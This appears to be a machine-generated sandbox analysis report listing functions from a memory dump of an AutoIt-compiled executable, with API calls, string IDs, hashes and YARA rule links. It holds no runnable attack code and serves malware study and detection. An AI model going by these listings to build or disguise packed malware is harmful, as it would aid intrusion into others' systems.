                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$DestroyMove
                                                                                                                                                                                                                                                                                                    • String ID: static
                                                                                                                                                                                                                                                                                                    • API String ID: 2139405536-2160076837
                                                                                                                                                                                                                                                                                                    • Opcode ID: bc112f24345f49a637cc01318b561210ee1eb44e21d211a867d7d8bc882b716a
                                                                                                                                                                                                                                                                                                    • Instruction ID: a52121c61692ae6a3ca6647f9edda9294add8be8e0c18c7bacc6fc7e3493c0a0
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bc112f24345f49a637cc01318b561210ee1eb44e21d211a867d7d8bc882b716a
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 98317E71110604AADB25DF78CC80BFB77A9FF89724F008619F9A587190DB75AC81EB60
                                                                                                                                                                                                                                                                                                    Function 00AA4FD5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00AA50BD
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00AA50D2
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                                    • String ID: '
                                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-1997036262
                                                                                                                                                                                                                                                                                                    • Opcode ID: 2931afc122a673ebf6a3c409fdd4e221ca250aa0f20e6fb26ef9c5af2e35c228
                                                                                                                                                                                                                                                                                                    • Instruction ID: 97bf4b0051e0c75e6f6b7d2f1b07823c6cec7c0be6f1b10ac751eca4b2c9bde9
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2931afc122a673ebf6a3c409fdd4e221ca250aa0f20e6fb26ef9c5af2e35c228
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 75311874E0160AAFDB14CFA9C980BDE7BB5FF4A300F10406AE904AB391D771A945CF94
                                                                                                                                                                                                                                                                                                    Function 00AA3C8B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00AA3D18
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00AA3D23
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                                    • String ID: Combobox
                                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-2096851135
                                                                                                                                                                                                                                                                                                    • Opcode ID: 92eef49d158cfe8cbf04ea694776180b5a6a8c44915f6c5e31d57999dabd16ed
                                                                                                                                                                                                                                                                                                    • Instruction ID: 0a26014bb7ba03f390c72a1d8f99646ad3ae2c39020802e6c1bf1ee73d7955a6
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 92eef49d158cfe8cbf04ea694776180b5a6a8c44915f6c5e31d57999dabd16ed
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 29119072600208BFEF118F54DC81FAB3B6AEB863A4F104525F915972D0D7719D5187A0
                                                                                                                                                                                                                                                                                                    Function 00AA41AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A17873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00A178B1
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A17873: GetStockObject.GDI32(00000011), ref: 00A178C5
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A17873: SendMessageW.USER32(00000000,00000030,00000000), ref: 00A178CF
                                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00AA4216
                                                                                                                                                                                                                                                                                                    • GetSysColor.USER32(00000012), ref: 00AA4230
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                                                                                                                                                                                    • String ID: static
                                                                                                                                                                                                                                                                                                    • API String ID: 1983116058-2160076837
                                                                                                                                                                                                                                                                                                    • Opcode ID: 90e3268c0a07d0607a713c92090bf44fc0838e07be2f79b7a6a27627ded13214
                                                                                                                                                                                                                                                                                                    • Instruction ID: cb40432c86ced309d3973c4471dc61acaf0f77c52a143a0cea18f9d82fbb0b04
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 90e3268c0a07d0607a713c92090bf44fc0838e07be2f79b7a6a27627ded13214
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5D11F67261020AAFDB01DFA8CC45AFE7BB8EB49314F014914F996E3290E775E8559B60
                                                                                                                                                                                                                                                                                                    Function 00A8D763 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00A8D7C2
                                                                                                                                                                                                                                                                                                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00A8D7EB
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Internet$OpenOption
                                                                                                                                                                                                                                                                                                    • String ID: <local>
                                                                                                                                                                                                                                                                                                    • API String ID: 942729171-4266983199
                                                                                                                                                                                                                                                                                                    • Opcode ID: 7d11e10b4b851d7b584052636e9158fa4e97b344da5003f3478be9921c246443
                                                                                                                                                                                                                                                                                                    • Instruction ID: f6bd9ce11172f3a076f30df36b359dae923d3a22310e17dd05f522301b4a61e6
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7d11e10b4b851d7b584052636e9158fa4e97b344da5003f3478be9921c246443
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6911C271205232BED7389B668C49EE7BFADEB127A8F10422AB549921C0D6649840D7F0
                                                                                                                                                                                                                                                                                                    Function 00A775ED Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A1B329: _wcslen.LIBCMT ref: 00A1B333
                                                                                                                                                                                                                                                                                                    • CharUpperBuffW.USER32(?,?,?), ref: 00A7761D
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00A77629
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _wcslen$BuffCharUpper
                                                                                                                                                                                                                                                                                                    • String ID: STOP
                                                                                                                                                                                                                                                                                                    • API String ID: 1256254125-2411985666
                                                                                                                                                                                                                                                                                                    • Opcode ID: 06a4f4da4c6bd9b8a7f60e9732b68954993930af0a9017efaadd1c521e74e714
                                                                                                                                                                                                                                                                                                    • Instruction ID: f41c12e3a4fa2d0a858af2f2009dfa9d0afa46ac72b97d02c6c7b5e71745fff2
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 06a4f4da4c6bd9b8a7f60e9732b68954993930af0a9017efaadd1c521e74e714
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6101D632614A278FCB10AFBDDC509BF73B6BF617507408534E429D7299EB31D950C690
                                                                                                                                                                                                                                                                                                    Function 00A7262B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A1B329: _wcslen.LIBCMT ref: 00A1B333
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A745FD: GetClassNameW.USER32(?,?,000000FF), ref: 00A74620
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00A72699
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                                    • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                                                    • Opcode ID: cab5153d22a3606a4f1ee896a58ec4c179df15d962465b52ced5e16ec58b4ff6
                                                                                                                                                                                                                                                                                                    • Instruction ID: 074bc9fb044c0c56a51cb585d240b4e97efe4446a4943669ccefc37ba21ea643
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cab5153d22a3606a4f1ee896a58ec4c179df15d962465b52ced5e16ec58b4ff6
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DF01B175650214ABCB08EBA4CC51DFE7778EF46350B008A1BA876973C1EB3158099760
                                                                                                                                                                                                                                                                                                    Function 00A72525 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A1B329: _wcslen.LIBCMT ref: 00A1B333
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A745FD: GetClassNameW.USER32(?,?,000000FF), ref: 00A74620
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 00A72593
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                                    • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                                                    • Opcode ID: a9518f5e7a445e5547c19f84d418b016edf436a446fce62a8adaeb8e86d0816f
                                                                                                                                                                                                                                                                                                    • Instruction ID: f9dddc0b0883d1f5ac3e8eb3385d40a032e9dc55744188d7e0389608c3cc6a2c
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a9518f5e7a445e5547c19f84d418b016edf436a446fce62a8adaeb8e86d0816f
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C601A775650105BBCB04E790CE62EFF77B9DF45340F50802A7827A7281DB159E0987B1
                                                                                                                                                                                                                                                                                                    Function 00A725A9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A1B329: _wcslen.LIBCMT ref: 00A1B333
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A745FD: GetClassNameW.USER32(?,?,000000FF), ref: 00A74620
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 00A72615
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                                    • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                                                    • Opcode ID: 71df5ace04b774f13aac5a44dd1ea87f783542e426178365c6dac9c92ffbf9e2
                                                                                                                                                                                                                                                                                                    • Instruction ID: cd45eb3d97d929fd3c659ed14f2b5198fef2f643476c27969614838fffa0fc33
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 71df5ace04b774f13aac5a44dd1ea87f783542e426178365c6dac9c92ffbf9e2
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2101AD75A40104AACB15E7A0DE02FFE77A8DB05380F508027B816A7281EB618E0997B1
                                                                                                                                                                                                                                                                                                    Function 00A726B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A1B329: _wcslen.LIBCMT ref: 00A1B333
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A745FD: GetClassNameW.USER32(?,?,000000FF), ref: 00A74620
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00A72720
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                                    • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                                                    • Opcode ID: fd9057c7bff146b4218777ae46c0c72429f89392b8c31c538f14085c29033e94
                                                                                                                                                                                                                                                                                                    • Instruction ID: 1a0242adcb1676a79205870015d17391f6ddff181e0832742024fcbd58a2d084
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fd9057c7bff146b4218777ae46c0c72429f89392b8c31c538f14085c29033e94
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BFF0FF75A40214AACB08E3A4CD42FFE77BCEF06380F40892AB432A32C1EB6058088360
                                                                                                                                                                                                                                                                                                    Function 00A71461 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00A7146F
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Message
                                                                                                                                                                                                                                                                                                    • String ID: AutoIt$Error allocating memory.
                                                                                                                                                                                                                                                                                                    • API String ID: 2030045667-4017498283
                                                                                                                                                                                                                                                                                                    • Opcode ID: bffe501949006bb9b4e033a895569e015774ea80fa3bab92ffc943a4de184daa
                                                                                                                                                                                                                                                                                                    • Instruction ID: adc8d7c5fda4f7d01927624f7ec2eb1320d7168b8f2182f6630e16fb9ebfaa9d
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bffe501949006bb9b4e033a895569e015774ea80fa3bab92ffc943a4de184daa
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 70E0D83134431436D2103798AD03FC5B6849F06B61F11481AF7C9558C28FE224904299
                                                                                                                                                                                                                                                                                                    Function 00A310B3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A2FAD4: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00A310E2,?,?,?,00A1100A), ref: 00A2FAD9
                                                                                                                                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,00A1100A), ref: 00A310E6
                                                                                                                                                                                                                                                                                                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00A1100A), ref: 00A310F5
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00A310F0
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                                                                                                                                                                                                                                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                                                                                                                                                                    • API String ID: 55579361-631824599
                                                                                                                                                                                                                                                                                                    • Opcode ID: dbda4015aafcfd37cd6622086a42bf4be88aca29a2c321d8995492bd360ae930
                                                                                                                                                                                                                                                                                                    • Instruction ID: 683f7035fa22e802dac7ff7397ed735a60068a8e5e71bbd4a9c186022dd760fd
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dbda4015aafcfd37cd6622086a42bf4be88aca29a2c321d8995492bd360ae930
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C1E0ED706007518FD324DF68E9457C2BBE8AB05745F048D6DF886C6691EBB4E489CB91
                                                                                                                                                                                                                                                                                                    Function 00A839D8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
